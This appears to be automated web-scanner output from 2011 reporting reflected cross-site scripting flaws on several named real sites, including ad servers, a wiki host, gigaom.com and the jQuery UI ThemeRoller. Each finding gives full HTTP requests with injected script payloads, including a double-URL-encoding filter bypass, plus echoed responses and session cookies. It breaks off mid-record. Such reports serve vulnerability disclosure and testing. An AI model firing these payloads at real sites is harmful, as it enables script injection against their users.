GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&80e34"><script>alert(1)</script>42beed0cd1e=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 399
The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d970%3balert(1)//85e58cc1d4b was submitted in the var parameter. This input was echoed as 5d970;alert(1)//85e58cc1d4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/ActivityServer.bs?cn=as&vn=omn&activityID=32638&advID=33048&var=s_1_Integrate_Eyeblaster_ACM_get_05d970%3balert(1)//85e58cc1d4b&rnd=9155849178792 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.rackspace.com/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001gNQ4ae7r0c9M00001ge4Hack+0bM000001; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 06-May-2011 10:21:35 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 05 Feb 2011 15:21:35 GMT Connection: close Content-Length: 89
var s_1_Integrate_Eyeblaster_ACM_get_05d970;alert(1)//85e58cc1d4b = {"errorCode": "nc" };
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 286b8<script>alert(1)</script>b7b9580d4d was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_1&location=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&uid=W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d&xy=251%2C232&wh=985%2C1012&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3D12D8119D7E0EE9993CA5854A82CAC7; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 137 Date: Sat, 05 Feb 2011 15:59:37 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d");
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 23d7a'><script>alert(1)</script>6c3841f6dc1 was submitted in the REST URL parameter 4. This input was echoed as 23d7a\'><script>alert(1)</script>6c3841f6dc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/06/22/cloud-computing23d7a'><script>alert(1)</script>6c3841f6dc1/ HTTP/1.1 Host: gigaom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Date: Sat, 05 Feb 2011 15:28:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Cookie X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://gigaom.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 15:28:08 GMT Cache-Control: no-cache, must-revalidate, max-age=60 Pragma: no-cache Content-Length: 82472
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 was submitted in the REST URL parameter 2. This input was echoed as 6860c<script>alert(1)</script>e2410f7e441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/ellerburnes6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:07:22 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui7tLDEkikBLW; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=CA2FCF825EAEF0C3F31FF2BEAE557522; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:07:22 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 24947
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 was submitted in the REST URL parameter 2. This input was echoed as ae99d<script>alert(1)</script>3618331fda0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/heidiannaae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:07:28 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui+hCCPQX9ohd; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=BE9914FABF088BEA75986B4ACEE64FA4; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:07:28 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 24940
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 was submitted in the REST URL parameter 2. This input was echoed as b03df<script>alert(1)</script>58156201246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/scottpjb03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:07:36 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q1eFPEj9bv+7BfltWrJMEs; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=65C7BB98781E26CF5BC6008F3D3429ED; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:07:36 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 24928
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1214<a>0a9fac97bad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:04 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=8B146C25F56ABEDF2E3CA5EA6487F687; Path=/ Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:59:04 GMT Vary: Accept-Encoding Content-Type: text/xml;charset=UTF-8 Content-Length: 3791
<?xml version="1.0" encoding="UTF-8"?><error status="2002985068"><message>No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad</message><stack><![CDATA[java.lang.IllegalArgumentException: No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad at java.lang.Enum.valueOf(Enum.java:196) at com.wetpaint.type.MetadataName.valueOf(MetadataName.java:3) at com.wetpaint.api.action.WikiDatumAction.executeGet(WikiDatumAction.java:39) at com.wetpaint.a ...[SNIP]...
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd697"><script>alert(1)</script>0e06b0d0009 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9cd697"><script>alert(1)</script>0e06b0d0009&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a43"><script>alert(1)</script>5df749b98b5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd86a43"><script>alert(1)</script>5df749b98b5&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a4f5"><script>alert(1)</script>14b71544016 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc1a4f5"><script>alert(1)</script>14b71544016&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcf1"><script>alert(1)</script>0d3c47e2367 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecfdcf1"><script>alert(1)</script>0d3c47e2367&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f53"><script>alert(1)</script>2c480b0a63e was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc41f53"><script>alert(1)</script>2c480b0a63e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9d"><script>alert(1)</script>7040f13f8da was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec8838c9d"><script>alert(1)</script>7040f13f8da&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
